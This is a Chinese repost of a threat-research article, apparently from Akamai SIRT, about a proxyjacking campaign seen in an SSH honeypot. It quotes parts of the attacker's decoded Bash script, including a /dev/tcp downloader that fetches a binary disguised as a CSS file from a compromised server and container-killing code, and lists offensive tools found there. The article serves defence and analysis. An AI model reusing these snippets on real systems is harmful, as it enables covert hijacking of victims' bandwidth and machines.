代理劫持:最新的网络犯罪副业

admin
admin
admin
103387
文章
87
评论
2023年7月5日21:38:29评论40 views字数 6813阅读22分42秒阅读模式
代理劫持:最新的网络犯罪副业
介绍
在不断发展的网络威胁世界中,攻击者不断寻求创新策略,以最大限度地提高收益,同时最大限度地减少努力。最新的例子是在 6 月初在 Akamai SIRT 的全球分布蜜罐之一中发现的:以盈利为目的的代理劫持。
尽管代理劫持的概念并不新鲜,但作为主流公司的附属公司轻松将其货币化的能力却是新的。提供一种简单的经济收益途径使这一媒介对企业界和普通消费者都构成威胁,从而提高了人们的认识和缓解措施的需要。新兴威胁格局的特点是 Meris 和 Anonymous苏丹等攻击者,当这种格局与通过代理网络传播的第 7 层攻击显着增加相结合时,大量可用代理的积累会产生巨大的货币价值。   
在这篇文章中,我们将深入研究由我们的安全研究人员在 SIRT 上发现的新代理劫持活动。这是一个活跃的活动,攻击者利用 SSH 进行远程访问,运行恶意脚本,秘密地将受害者服务器纳入对等 (P2P) 代理网络,例如 Peer2Proxy 或 Honeygain。 
这使得攻击者可以利用毫无戒心的受害者的额外带宽来货币化,而只需要加密货币挖矿所需资源负载的一小部分,而且被发现的机会也更少。 
我们将描述该活动的技术细节,并探讨以盈利为目的的代理劫持的威胁概况。我们还将提出缓解建议。我们希望将旧技术的新用例带到最前沿。
什么是代理劫持?
加密劫持在世界范围内已经相当众所周知:受害者的资源被窃取,用于为矿池做出贡献,以换取攻击者获得的金钱。最近兴起的一种鲜为人知的技术称为代理劫持。 
通过代理劫持,攻击者不仅窃取资源,还利用受害者未使用的带宽。受害者的系统被秘密用来作为 P2P 代理节点运行各种服务,攻击者最近开始通过 Peer2Profit 或 Honeygain 等组织从中获利。这些公司为普通用户提供了通过额外带宽获得报酬的机会,这对许多人和实体来说都是有吸引力且合法的前景。 
然而,这些网站通常不会询问新代理节点的来源,这就是非法性的开始。尽管代理劫持行为已经存在了一段时间,但直到最近才开始严格用于盈利,这就是我们在这次活动中观察到的。
代理对网络犯罪分子有什么价值?
网络犯罪分子的代理价值在于其混淆踪迹的能力,这使得追踪非法活动的起源变得极具挑战性。这种混淆是通过在到达最终目的地之前通过多个对等节点路由恶意流量来实现的。图 1 说明了这一点,显示了个人如何公开交换对代理的访问权限,从而为其流量提供多样化的路径。 
该特定列表是通过与本次调查所关注的主要 IP 相关的在线帖子而发现的,其中包含超过 16,500 个其他开放代理。随着代理劫持的兴起,很明显,并非所有这些节点都愿意作为对等节点参与该网络。此列表也绝不是详尽的,因为还发现了许多其他帖子。

代理劫持:最新的网络犯罪副业

图 1:在线论坛上发布的开放代理共享列表(IP 已编辑)
在这篇博文中讨论的活动中,我们的重点不是传统的“开放”代理,因为 Peer2Profit 和 Honeygain 等公司声称只与理论上经过审查的合作伙伴共享其代理。然而,这些公司为帮助代理网络做出贡献而提供的激励措施不仅吸引了合法安装以获得被动收入,而且还吸引了那些试图以牺牲他人利益为代价利用该系统的人。
同样,他们提供的实际服务肯定会吸引合法企业和威胁行为者。因此,这个案例清楚地提醒我们这些看似有益的服务可能存在潜在的安全隐患。
这一特定活动于 2023 年 6 月 8 日首次曝光。我们的团队注意到攻击者与我们的一个 Cowrie 蜜罐(图 2)(由 SIRT 管理的资产)建立了多个 SSH 连接。由于我们对该蜜罐的完全控制和监控能力,我们能够跟踪和记录攻击者采取的所有行动,这些行动主要是通过编码的 Bash 脚本执行的。

代理劫持:最新的网络犯罪副业

图 2:SSH 蜜罐中代理劫持活动的映射
攻击者首先采取的行动是使用双 Base64 编码的 Bash 脚本(图 3),这是一种常用技术,用于掩盖脚本的真实功能并逃避安全系统。

代理劫持:最新的网络犯罪副业

图 3:攻击者编码的 Bash 脚本
成功解码模糊的 Bash 脚本后,我们就可以清楚地了解攻击者的代理劫持手法。通过记录此解码脚本,我们可以仔细剖析攻击者意图的操作的性质和顺序。
扰乱、部署、消失
此解码脚本有效地将受感染的系统转换为 Peer2Profit 代理网络中的节点,使用 $PACCT 指定的帐户作为将从共享带宽中获利的附属帐户。不久之后,Honeygain 的安装也发现了同样的情况。该脚本被设计为隐秘且强大的,无论主机系统上安装了什么软件,都会尝试进行操作。
该脚本首先定义了一些函数供以后使用,其中第一个函数是curl的基本实现:
function __curl() {  read proto server path <<<$(echo ${1//// })  DOC=/${path// //}  HOST=${server//:*}  PORT=${server//*:}  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80  exec 3<>/dev/tcp/${HOST}/$PORT  echo -en "GET ${DOC} HTTP/1.0rnHost: ${HOST}rnUser-Agent: curl/6.1.9rnrn" >&3  (while read line; do   [[ "$line" == $'r' ]] && break  done && cat) <&3  exec 3>&-}
然后在第二个函数中使用它来下载curl的实际版本(在分发服务器上托管为“csdark.css”)。似乎curl是该方案工作所需的全部,所以如果它不存在于受害者主机,然后攻击者代表他们下载它。
c(){  if ! command -v curl &>/dev/null;then    __curl http://xxx.xxx.xxx.xxx/main/dist/css/csdark.css > curl    if ! md5sum curl|grep -q 2a88b534fa8d58cef93e46c4ab380b23;then      echo "could not get curl"      exit    fi    chmod +x curl    export PATH=$PWD:$PATH  fi}
根据我们的分析,这实际上只是旋度的正则分布,没有太多或任何修改。其中可能存在附加功能,无论是性能增强功能还是恶意功能,但目前我们没有理由相信情况确实如此。 
该可执行文件真正有趣的是,尽管所有第三方供应商都将其列为完全良性的(图 4),但这是引导我们进行更深入调查的最初工件。这种干净的声誉进一步支持了这样的说法:这只是curl实用程序的标准发行版。正是能够查看工件的来源,才将其从一段无害的代码变成了我们现在所知的代理劫持方案的一部分。这凸显了能够隔离所有异常工件的重要性,而不仅仅是那些被认为是恶意的工件。

代理劫持:最新的网络犯罪副业

图 4:显示下载的curl 应用程序良好信誉的屏幕截图
攻击者还定义了另一个函数以移动到可写和可执行位置,例如 /dev/shm 或 /tmp。如果没有找到合适的目录,则可执行文件退出。
d(){  cd /dev/shm && cp /bin/ls . && ./ls &>/dev/null && rm -f ls && return  cd /tmp && cp /bin/ls . && ./ls &>/dev/null && rm -f ls && return  #mkdir -p $HOME/.cache/apt && cd $HOME/.cache/apt && return  echo "no suitable dir"  exit}
脚本中定义的最终函数做了一些设置机器人的工作,但该函数的调用实际上在主脚本中被注释掉,并替换为可能更具功能性的代码。其余代码是大部分操作发生的地方。 
出于安全原因,我们无法共享所有这些代码,但我们可以引用其中的部分代码,以便您了解我们正在讨论的内容。代码的某些部分使用 [...] 进行了编辑。
这些脚本首先检查它们自己的容器是否已经启动并运行:
if ps axjf|[...]|grep […] "$PACCT";then  echo "already running"  exit
然后,他们检查是否存在其他运行竞争带宽共享容器的容器并杀死它们。
if docker ps [...] |grep [...] peer2profit [...] p2pclient;then  for con in [...];do    if ! docker [...]|grep [...] "$PACCT";then      [...]      docker stop -t 10 $con      docker stop -s KILL $con      docker stop $con      echo "killed container: $con"    fi  donefi
他们首先创建一个工作目录,然后从包含资源共享程序的公共 Docker 存储库下载 Docker 镜像,并将其命名为“ postfixd ”。从那里,他们只需按照公开的说明下载和解压镜像的 Docker 层,删除一些剩余的工件,然后就离开。
cd .. && rm -rf pfp
多元化互联网带宽的价值
此活动中发现的特定 P2P 代理货币化方案是 Peer2Profit 和 Honeygain,这两个方案都拥有下载量超过 100 万次的公共 Docker 镜像(图 5)。

代理劫持:最新的网络犯罪副业

图 5:Honeygain 的公共 Docker 镜像,下载量达 100 万次
在这些代理劫持的情况下,代理被理论上合法但可能不道德的公司用于数据收集和广告等目的(图 6)。其中一些公司甚至可以让您准确了解流量的使用情况。

代理劫持:最新的网络犯罪副业

图6:Peer2Profit网站截图
这些应用程序本质上并不是恶意的,而是恶意的。它们被宣传为自愿服务,为用户提供分享未使用的互联网带宽以换取金钱补偿的机会(图 7)。交易相当简单,但其中一些公司没有正确验证网络中 IP 的来源,甚至偶尔建议人们在工作计算机上安装该软件。

代理劫持:最新的网络犯罪副业

图 7:Peer2Profit 图像显示了该服务的工作原理(来源:https://peer2profit.com/)
当合法活动演变成网络犯罪时
当应用程序在用户不知情或未经用户同意的情况下部署时,情况会发生巨大变化,从而有效地利用他们的资源。这就是使用这些服务的看似无害的行为转向网络犯罪领域的地方。攻击者通过征用多个系统及其带宽,有效地放大了他们从服务中获得的潜在收入,而这一切都是以受害者为代价的。
这种情况与加密货币挖矿和加密货币劫持之间的差异非常相似。加密货币挖矿本身是一种合法活动,个人使用计算资源来挖掘加密货币。然而,当它演变成加密劫持时,它涉及未经授权使用他人的计算资源进行挖矿,从而将原本无害的活动变成恶意活动。
分发服务器一瞥
我们的调查引导我们检查用于拉取恶意 Bash 脚本中使用的curl 二进制文件的服务器。这是一种无文件攻击,它继续依赖分发服务器来正确执行。 
在查看该网站时,我们很快得出结论,这是一个受到感染的 Web 服务器,被用来分发各种攻击组件。我们可以从这个网站追溯到利比亚一家专门生产“优质建筑材料”的公司。 
我们评估的第一步是查看与curl 二进制文件(csdark.css,如果您还记得的话)位于同一路径中的其他内容(图8)。

代理劫持:最新的网络犯罪副业

图 8:受感染 Web 服务器上托管内容的列表
通过对该 Web 服务器构建技术的一些分析,我们发现它有多个过时且未维护的组件。该网站路径专门用于支持一个名为 Metro-bootstrap 的库,该库已不再维护。通过熟悉这个库,我们能够解释 2014 年最后修改的三个文件。 
然而,较新的文件使我们相信该服务器已被破坏,现在被用作各种活动的下载点。为了分析这些文件,我们使用“ wget -r ”下载所有文件。
csdark.css文件是我们之前讨论的curl 可执行文件,通过查看日期我们可以推断metro -bootstrap.min.xcss可能已用作一种测试文件上传,其中csdark.css 添加了最明天。这使得vksp下落不明。根据以下 VirusTotal 条目(图 9),vksp实际上是一个名为perfcc的程序,它是一个特定于 Linux 的 cryptominer。

代理劫持:最新的网络犯罪副业

图 9:显示 perfcc 在 VirusTotal 上标记为恶意的屏幕截图
我们也对该文件进行了一些分析,发现它实际上包含一个加密挖掘实用程序,以及许多其他漏洞和常见的黑客工具。
~/.local/bin$ ls  addcomputer.py  exchanger.py        getST.py          ldd2pretty            normalizer       raiseChild.py     secretsdump.py  split.py  atexec.py       findDelegation.py   getTGT.py         lookupsid.py          ntfs-read.py     rbcd.py           services.py     ticketConverter.py  crontab         flask               GetUserSPNs.py    machine_role.py       ntlmrelayx.py    rdp_check.py      smbclient.py    ticketer.py  cygdb           futurize            goldenPac.py      mimikatz.py           pasteurize       registry-read.py  smbexec.py      top  cython          GetADUsers.py       karmaSMB.py       mqtt_check.py         ping6.py         reg.py            smbpasswd.py    wmiexec.py  cythonize       getArch.py          keylistattack.py  mssqlclient.py        ping.py          rpcdump.py        smbrelayx.py    wmipersist.py  dcomexec.py     Get-GPPPassword.py  kintercept.py     mssqlinstance.py        psexec.py      rpcmap.py         smbserver.py    wmiquery.py  dpapi.py        GetNPUsers.py       ldapdomaindump    netview.py            ps.old           sambaPipe.py      sniffer.py  esentutl.py     getPac.py           ldd2bloodhound    nmapAnswerMachine.py    __pycache__    samrdump.py       sniff.py
这一发现对我们来说很有意义,因为历史上一直坚持将加密劫持作为收入来源的威胁行为者现在将通过代理劫持来转向或至少补充这一活动,这是理所当然的。看到这两个可执行文件托管在同一个受感染的网站上,可以作为一小部分证据,证明参与者将立即看到这种新的货币化策略的价值。
影响和威胁形势的相关性
继许多其他形式的通过受感染设备的犯罪赚钱计划之后,以盈利为目的的代理劫持的出现也随之出现。最明显的比较是加密劫持,但通过犯罪手段获取合法服务并滥用其盈利能力的策略可以追溯到更早的时期。 
另一个典型的例子是,垃圾邮件的起源很大程度上始于联属营销,即使在今天也是一种非常常见的做法。只要您将客户吸引到他们的网站,一些公司就会根据点击次数向您付费,但许多公司忽略了人们使用垃圾邮件来做到这一点的事实。只要这些激励措施存在,并且公司愿意忽视采购的道德规范,犯罪行业就会围绕利用这些做法而建立。 
关于代理积累的另一个事实使其特别相关和令人担忧:代理劫持本质上解决了加密劫持的唯一重大缺点 - 通过高 CPU 使用率进行检测。通过需要最少的 CPU,而不是依赖未使用的互联网带宽,代理劫持可以避免以前用于加密劫持的一些检测手段。 
如何防御代理劫持
CPU 使用率降低意味着从企业角度更加重视 IDS/IPS 解决方案来缓解代理劫持。日常用户应该实施强大的安全基础,例如使用复杂的密码并将其存储在密码管理器中、对应用程序应用补丁以及尽可能启用多重身份验证 ( MFA )。对计算机安全有更深入了解的用户还可以通过关注当前运行的容器、监控网络流量是否存在异常、甚至定期运行漏洞扫描来保持警惕。
在此特定活动中,我们看到使用 SSH 来访问服务器并安装 Docker 容器,但过去的活动也利用了 Web 漏洞。如果您检查本地运行的 Docker 服务并发现系统上有任何不需要的资源共享,您应该调查入侵,确定脚本的上传和运行方式,并执行彻底的清理。 
请务必检查是否有任何其他入侵或妥协的迹象。更改所有密码,确保所有软件都是最新的,并考虑实施更严格的安全策略。此外,如果受影响的系统敏感或包含有价值的数据,您应该考虑使用专业的事件响应服务。
除了这些攻击的偷偷摸摸的性质之外,开放代理还是网络犯罪分子武器库中的重要工具,Meris 和匿名苏丹等犯罪组织展示了代理攻击的破坏性和痛苦程度。随着第 7 层攻击的持续上升,这个问题只会继续增加,而依赖这些代理网络公司正确管理其合作伙伴是一种非常差的防御机制和薄弱的保证。


IOCs

Hashes

  • 6f1ac1e711e662edad32713c135ce29562d636794cf5a21a44bbb34955610f0a  - vksp

  • 72e7dd199bed6eefa0ae763c399e0d8a56e2b1dfacc089046706226a5f2a




感谢您抽出

代理劫持:最新的网络犯罪副业

.

代理劫持:最新的网络犯罪副业

.

代理劫持:最新的网络犯罪副业

来阅读本文

代理劫持:最新的网络犯罪副业

点它,分享点赞在看都在这里

原文始发于微信公众号(Ots安全):代理劫持:最新的网络犯罪副业

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月5日21:38:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   代理劫持:最新的网络犯罪副业https://cn-sec.com/archives/1850813.html

发表评论

匿名网友 填写信息